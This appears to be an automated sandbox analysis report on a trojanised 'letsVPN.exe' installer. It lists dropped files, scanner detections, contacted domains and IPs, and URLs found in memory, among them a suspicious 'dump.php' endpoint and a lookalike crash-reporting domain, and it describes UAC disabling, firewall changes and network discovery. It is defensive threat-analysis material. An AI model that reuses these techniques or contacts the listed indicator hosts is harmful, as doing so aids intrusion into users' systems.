              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582024 Sample: letsVPN.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 62 130 yandex.com 2->130 132 www.yandex.com 2->132 134 8 other IPs or domains 2->134 150 Multi AV Scanner detection for submitted file 2->150 152 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 2->152 154 Machine Learning detection for sample 2->154 156 6 other signatures 2->156 11 mmc.exe 1 2->11         started        13 letsVPN.exe 3 17 2->13         started        17 mmc.exe 1 1 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 22 letsvpn-latest.exe 11->22         started        122 C:\ProgramData\letsvpn-latest.exe, PE32 13->122 dropped 124 C:\ProgramData\...\sinaplayer_service.exe, PE32 13->124 dropped 126 C:\ProgramData\0zVlL\Jd0i4~16\s, PE32 13->126 dropped 128 3 other files (none is malicious) 13->128 dropped 176 Uses netsh to modify the Windows network and firewall settings 13->176 26 cmd.exe 1 13->26         started        28 cmd.exe 1 13->28         started        30 cmd.exe 2 13->30         started        32 netsh.exe 2 13->32         started        34 sinaplayer_service.exe 1 7 17->34         started        138 127.0.0.1 unknown unknown 19->138 178 Modifies the DNS server 19->178 37 drvinst.exe 19->37         started        39 drvinst.exe 19->39         started        41 LetsPRO.exe 19->41         started        file6 signatures7 process8 dnsIp9 100 C:\Program Files (x86)\...\tap0901.sys, PE32+ 22->100 dropped 102 C:\Program Files (x86)\...\netstandard.dll, PE32 22->102 dropped 104 C:\Program Files (x86)\...\LetsPRO.exe, PE32 22->104 dropped 112 219 other files (3 malicious) 22->112 dropped 158 Bypasses PowerShell execution policy 22->158 160 Modifies the windows firewall 22->160 162 Sample is not signed and drops a device driver 22->162 43 LetsPRO.exe 22->43         started        45 powershell.exe 22->45         started        56 9 other processes 22->56 164 Uses cmd line tools excessively to alter registry or file data 26->164 48 reg.exe 1 26->48         started        50 reg.exe 1 26->50         started        59 2 other processes 26->59 166 Uses ipconfig to lookup or modify the Windows network settings 28->166 61 2 other processes 28->61 106 C:\ProgramData\0zVlL\Jd0i4~16\base.dll, PE32 30->106 dropped 52 conhost.exe 30->52         started        136 8.217.212.245, 15628, 49725 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 34->136 114 4 other files (none is malicious) 34->114 dropped 54 cmd.exe 34->54         started        116 2 other files (none is malicious) 37->116 dropped 108 C:\Windows\System32\...\tap0901.sys (copy), PE32+ 39->108 dropped 110 C:\Windows\System32\drivers\SETC543.tmp, PE32+ 39->110 dropped file10 signatures11 process12 file13 63 LetsPRO.exe 43->63         started        168 Loading BitLocker PowerShell Module 45->168 67 conhost.exe 45->67         started        170 Disables UAC (registry) 48->170 172 Disable UAC(promptonsecuredesktop) 50->172 174 Performs a network lookup / discovery via ARP 54->174 69 conhost.exe 54->69         started        71 ipconfig.exe 54->71         started        118 C:\Users\user\AppData\...\tap0901.sys (copy), PE32+ 56->118 dropped 120 C:\Users\user\AppData\Local\...\SETBAE5.tmp, PE32+ 56->120 dropped 73 conhost.exe 56->73         started        75 conhost.exe 56->75         started        77 conhost.exe 56->77         started        79 11 other processes 56->79 signatures14 process15 dnsIp16 140 yandex.com 77.88.55.88, 443, 49877 YANDEXRU Russian Federation 63->140 142 23.98.101.155, 443, 49887, 49936 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 63->142 144 11 other IPs or domains 63->144 146 Loading BitLocker PowerShell Module 63->146 81 cmd.exe 63->81         started        84 cmd.exe 63->84         started        86 cmd.exe 63->86         started        signatures17 process18 signatures19 148 Performs a network lookup / discovery via ARP 81->148 88 conhost.exe 81->88         started        90 ARP.EXE 81->90         started        92 conhost.exe 84->92         started        94 ipconfig.exe 84->94         started        96 conhost.exe 86->96         started        98 ROUTE.EXE 86->98         started        process20

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              letsVPN.exe32%VirustotalBrowse
              letsVPN.exe24%ReversingLabsWin32.Ransomware.Generic
              letsVPN.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\letsvpn\LetsPRO.exe0%ReversingLabs
              C:\Program Files (x86)\letsvpn\Update.exe0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll3%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe3%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe3%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll0%ReversingLabs
              C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://foo/Themes/TextBoxDictionary.xaml0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamld0%Avira URL Cloudsafe
              http://foo/bar/themes/tabcontrollerdictionary.bamld0%Avira URL Cloudsafe
              http://foo/Themes/TabControllerDictionary.xaml0%Avira URL Cloudsafe
              http://logging.apache.org/log4net/release/faq.html#trouble-EventLog0%Avira URL Cloudsafe
              http://www.hardcodet.net/taskbar0%Avira URL Cloudsafe
              http://foo/bar/themes/windowdictionary.baml0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamld0%Avira URL Cloudsafe
              http://125.211.213.34/dump.php0%Avira URL Cloudsafe
              https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid0%Avira URL Cloudsafe
              http://foo/Themes/ScrollViewDictionary.xamld0%Avira URL Cloudsafe
              https://in.appcenter.ms./logs?api-version=1.0.00%Avira URL Cloudsafe
              http://schemas.fontawesome.io/icons/0%Avira URL Cloudsafe
              http://www.atomixbuttons.com/textcalc0%Avira URL Cloudsafe
              http://foo/bar/themes/textboxdictionary.bamld0%Avira URL Cloudsafe
              http://foo/bar/themes/radiobuttondictionary.bamld0%Avira URL Cloudsafe
              http://wpfanimatedgif.codeplex.com0%Avira URL Cloudsafe
              http://logging.apache.org/log4ne0%Avira URL Cloudsafe
              http://home.pacific.net.sg/~jupboo0%Avira URL Cloudsafe
              http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ0%Avira URL Cloudsafe
              http://rcd.video.sina.com.cn/realtime_pcdesktop0%Avira URL Cloudsafe
              http://fontawesome.iohttp://fontawesome.io/license/Copyright0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xaml0%Avira URL Cloudsafe
              http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=0%Avira URL Cloudsafe
              https://1wm27s.onelink.me/DPiD/s5eizipo-10%Avira URL Cloudsafe
              http://www.xmlspy.com)0%Avira URL Cloudsafe
              http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt0%Avira URL Cloudsafe
              http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamld0%Avira URL Cloudsafe
              http://www.winimage.com/zLibDllnetwork_change0%Avira URL Cloudsafe
              http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting0%Avira URL Cloudsafe
              http://foo/app.xamld0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              nal.fqoqehwib.com
              		10.176.38.125
              		truefalse
                		high
                www.wshifen.com
                		103.235.46.96
                		truefalse
                  		high
                  d1dmgcawtbm6l9.cloudfront.net
                  		13.227.9.159
                  		truefalse
                    		unknown
                    socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com
                    		18.136.139.158
                    		truefalse
                      		high
                      www.google.com
                      		172.217.21.36
                      		truefalse
                        		high
                        nit.crash1ytics.com
                        		223.61.70.52
                        		truefalse
                          		high
                          yandex.com
                          		77.88.55.88
                          		truefalse
                            		high
                            chr.alipayassets.com
                            		222.91.58.119
                            		truefalse
                              		high
                              in.appcenter.ms
                              		unknown
                              		unknownfalse
                                		high
                                ws-ap1.pusher.com
                                		unknown
                                		unknownfalse
                                  		high
                                  www.yandex.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.baidu.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/myuser/myrepoletsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%Bletsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/CommunityToolkit/WindowsCommunityToolkitOletsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalwletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinalletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://intercom.help/letsvpn-world/en/articles/2922442-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://foo/Themes/TextBoxDictionary.xamlLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversatletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordTextletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://foo/Themes/TabControllerDictionary.xamlLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://logging.apache.org/log4net/release/faq.html#trouble-EventLogletsvpn-latest.exe, 00000013.00000003.2515524419.000000000283C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776876574.0000000005882000.00000002.00000001.01000000.0000001B.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nit.crash1ytics.com/app36/deviceErrorLetsPRO.exe, 00000038.00000002.3925778134.000000000F086000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://docs.oasis-open.org/wsfed/authorization/200706letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/namequalifierletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://foo/bar/themes/tabcontrollerdictionary.bamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancelletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.hardcodet.net/taskbarletsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalidletsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issueletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://foo/bar/themes/windowdictionary.bamlLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://intercom.help/letsvpn-world/en/articles/8262897-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%Dletsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://125.211.213.34/dump.phpsinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpageletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT-Cancelletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://intercom.help/letsvpn-world/en/collections/Killerletsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                            		high
                                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinalvhttp://docs.oasis-open.org/ws-sx/wsletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.fontawesome.io/icons/letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://in.appcenter.ms./logs?api-version=1.0.0letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                		high
                                                                                                                http://foo/Themes/ScrollViewDictionary.xamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.atomixbuttons.com/textcalcletsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://foo/bar/themes/textboxdictionary.bamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2664706128.0000000004951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://wpfanimatedgif.codeplex.comletsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://logging.apache.org/log4neLetsPRO.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
